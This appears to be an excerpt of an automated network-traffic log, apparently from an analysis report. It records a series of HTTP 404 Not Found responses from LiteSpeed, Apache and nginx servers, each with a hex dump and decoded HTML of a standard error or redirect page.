Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Mon, 25 Nov 2024 12:56:37 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:57:38 GMTServer: Apache/2.4.56 (Debian)Content-Length: 97Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="0;url=/" /></head><body></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:57:41 GMTServer: Apache/2.4.56 (Debian)Content-Length: 97Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="0;url=/" /></head><body></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:57:44 GMTServer: Apache/2.4.56 (Debian)Content-Length: 97Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="0;url=/" /></head><body></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:57:47 GMTServer: Apache/2.4.56 (Debian)Content-Length: 97Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="0;url=/" /></head><body></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:57:54 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:57:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:58:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:58:02 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:58:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:58:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:58:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:58:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

